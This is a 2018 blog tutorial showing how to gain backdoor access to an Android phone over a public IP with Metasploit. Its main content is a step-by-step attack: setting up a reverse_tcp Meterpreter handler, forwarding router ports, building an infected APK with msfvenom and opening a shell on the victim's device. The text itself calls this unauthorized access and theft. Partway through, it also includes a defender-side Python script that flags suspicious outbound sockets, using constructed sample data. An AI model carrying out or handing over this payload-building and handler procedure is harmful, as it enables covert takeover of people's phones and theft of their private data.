How to Gain Remote Access To an Android with Metasploit (Public IP)

by hash3liZer, 12 April 2018


Welcome to the Metasploit exploitation tutorial. In this tutorial, we will be gaining backdoor access to an Android target with Metasploit over a public IP. We will be working with the Metasploit exploit handler and an executable Meterpreter Android payload for the remote access.

Metasploit

Metasploit is an exploitation framework used by researchers to break into vulnerable systems with a designed set of exploits. It provides a reasonably up-to-date database of exploits together with various payloads and other modules, which are used to perform tasks on the target such as sniffing keystrokes, executing arbitrary shell commands and silently taking snapshots.

Beyond everything else Metasploit offers, its basic purpose is to test an application through the loopholes that have been discovered in it.

Android is a heavily targeted operating system. To preserve its state, these systems are well maintained and updated, and the firewalls of such systems are well acquainted with the way exploits execute. So there is a chance that the target firewall recognizes the nature of the exploit while the payload is still establishing itself.

Prerequisites

A solid understanding of the command line environment and command syntax, and knowledge of basic commands such as ip route. Metasploit installed. This tutorial is explained on the basis of Kali Linux as the attacker OS and Android KitKat as the target OS.

Gaining Remote Access to Android Smartphone Over Public IP

STEP 1

Preparing Metasploit

Open the console (terminal). Check for the weekly updates and update Metasploit if necessary or if any new modules are detected. Doing so keeps you informed of newly added modules and exploits.

msfupdate

After that, start the postgresql database service. Metasploit uses postgresql as its storage server. This lets us quickly navigate and search through Metasploit modules, avoiding the slow-search issue that wastes time while the output is being compiled.

systemctl enable postgresql
systemctl start postgresql

Enabling postgresql starts it every time the system boots, so there is no need to repeat this step the next time Metasploit is launched.

Type msfconsole in the terminal and press [Enter]. It takes a few seconds to bring the interface up to its fully functional state.

msfconsole

STEP 2

Choose the exploit

Search for an appropriate exploit for the target OS using the search command. Our target is an Android smartphone, so the query for Android could be:

search type:exploit platform:android

It lists the exploits available for the Android platform. You can get help on Metasploit commands by typing help followed by a space and the command name, such as help search, which prints the manual for the search command. Here is the output of the Android exploit search:


From the list of exploits shown in the search output, we will use the generic exploit that is highlighted. To use the exploit, enter this command:

use exploit/multi/handler

There is a set of payloads available for every exploit. Payloads are the modules that provide the environment for transferring and executing commands on the target. Different payloads are used according to the scenario and according to how much working space on the target is required. To show the payloads available for an exploit, type:

show payloads

From the available set of payloads, we will use android/meterpreter/reverse_tcp. It is a versatile payload to get started with. It brings us a Meterpreter session if the payload executes without being spotted. This Meterpreter payload offers a handful of directives that are sufficient to wholly compromise the target system.

set PAYLOAD android/meterpreter/reverse_tcp

STEP 3

Set Options

Get the information on the exploit using the info command. This is the key step for understanding how the exploit actually works. It gives you background information such as the possible targets and what the core of the vulnerability is.

info

At this point, we know how the exploit works. Now we have to set up the options for our exploit, which are LHOST for the attacker's local address and LPORT for the local port to use. To find the local IP address, type:

ip route

So, my local IP is 192.168.1.10. Set LHOST and LPORT:

set LHOST 192.168.1.10
set LPORT 777         # Port for establishing connections

Make sure that both parameters have been set correctly.

show options

STEP 4

Run the Exploit

Run the exploit as a job. The exploit executes in the background and notifies you whenever the payload executes on the target system. Afterward, we will use the sessions command to open the target session.

exploit -j

STEP 5

IP Forwarding

Find the gateway IP of your network, then navigate to that IP in a web browser and log in. Type:

route -n

Now open a web browser and log in to the router's administrative page.


After a successful login, forward port 777 so that the firewall allows the client and attacker machines to send and receive traffic. If you don't know how to forward a port on your router, go to portforward.com, search for your router's manufacturer and model and follow the instructions for your router.

STEP 6

Generate (Infected) Application

To generate the infected (payload) application with the .apk extension, we will use msfvenom, the native payload generator of the Metasploit framework. Open a new console (terminal) and generate a simple payload application for Android.

msfvenom -p android/meterpreter/reverse_tcp --platform android -o /root/Desktop/application.apk LHOST=<attacker public IP address> LPORT=777

PARAMETER BREAKDOWN

  • -p: payload to use
  • --platform: Target Platform
  • -o: Path to place the infected file
  • LHOST: Public IP of attacker (local) Machine
  • LPORT: Public Port of attacker (local) Machine

STEP 7

Own the target

Now, as soon as the generated apk file runs on the Android operating system (target), the Metasploit terminal we left open brings us a live target session. List the available sessions:

sessions -l

To interact with a session, type the session identifier (ID) after the sessions directive. It takes you to the Meterpreter shell.

sessions [n]      # [n] is the ID of available sessions
sessions 2

The Meterpreter terminal is launched. Type the help command. It lists a handful of commands, from getting system info to starting a live chat.

meterpreter > help

Ignore the meterpreter > part; it is just the prompt indicating that this is a Meterpreter session.

Let's try the shell command. It brings us the terminal (or cmd, if Windows) of the target system. Try executing a command.

meterpreter > shell
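On the other side of this procedure, the android/meterpreter/reverse_tcp stager shows up on the phone as one established outbound TCP socket from the payload app to the attacker's public LHOST on LPORT. The script below is an added defender-side example, not part of the tutorial or of Metasploit: it parses ss -tnp style output (the sample lines are constructed, and the port list and internal ranges are assumptions to tune for your environment) and flags established sockets to an external address on a port where ordinary phone traffic is not expected.

```python
import ipaddress
import re

# Ports where ordinary phone traffic is expected (web, mail, DoT, Google push);
# anything else to an external IP is worth a look. Tune per environment.
EXPECTED_PORTS = {80, 443, 853, 465, 587, 993, 995, 5228, 5229, 5230}
# Ranges treated as "inside": RFC 1918, CGNAT, loopback, link-local, ULA.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    '10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16', '100.64.0.0/10',
    '127.0.0.0/8', '169.254.0.0/16', '::1/128', 'fe80::/10', 'fc00::/7')]
# Constructed sample in the layout of `ss -tnp` on the phone (not a real
# capture). Line 3 models the tutorial's android/meterpreter/reverse_tcp
# stager calling back to the attacker's public LHOST on LPORT 777.
SAMPLE_SS_OUTPUT = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 192.168.43.21:41234 142.250.72.46:443 users:(("com.android.chrome",pid=1201,fd=33))
ESTAB 0 0 192.168.43.21:53012 192.168.43.1:8009 users:(("com.google.android.apps.tv",pid=1311,fd=12))
ESTAB 0 0 192.168.43.21:49622 203.0.113.25:777 users:(("com.metasploit.stage",pid=1407,fd=8))
ESTAB 0 0 192.168.43.21:49950 [2001:db8::9]:4444 users:(("com.example.notes",pid=1522,fd=15))
"""

SOCK_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+\S+\s+(?P<peer>\S+)'
    r'(?:\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?')

def split_endpoint(endpoint):
    """'host:port' or '[v6]:port' -> (ip_address, int port)."""
    host, _, port = endpoint.rpartition(':')
    return ipaddress.ip_address(host.strip('[]')), int(port)

def is_external(addr):
    """True unless the address falls inside one of INTERNAL_NETS."""
    addr = ipaddress.ip_address(addr)
    return not any(addr in net for net in INTERNAL_NETS)

def find_suspicious_sockets(ss_output, expected_ports=EXPECTED_PORTS):
    """(process, pid, peer_ip, peer_port) for each ESTAB socket to an external peer on an unexpected port."""
    hits = []
    for line in ss_output.splitlines():
        m = SOCK_RE.match(line)
        if not m or m.group('state') != 'ESTAB':
            continue  # header line or not an established connection
        try:
            peer_ip, peer_port = split_endpoint(m.group('peer'))
        except ValueError:
            continue  # malformed endpoint: skip rather than abort the sweep
        if is_external(peer_ip) and peer_port not in expected_ports:
            hits.append((m.group('proc') or '?', int(m.group('pid') or 0),
                         str(peer_ip), peer_port))
    return hits
```

On the sample, only the com.metasploit.stage socket to port 777 and the com.example.notes socket to port 4444 are returned; the Chrome session on 443 and the local Cast connection are ignored.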

Conclusion

We have seen how to gain unauthorized access to an Android smartphone with Metasploit and how to disclose the target's private data with a given set of Meterpreter commands. Before you proceed to a live target, make sure you are well acquainted with all the possible consequences of such a theft; they may have disastrous impacts. As already mentioned, Metasploit is a vulnerability assessment project. Its main intention is to familiarize you with how powerful a loophole can be and which sectors of a system it could give access to and leave compromised.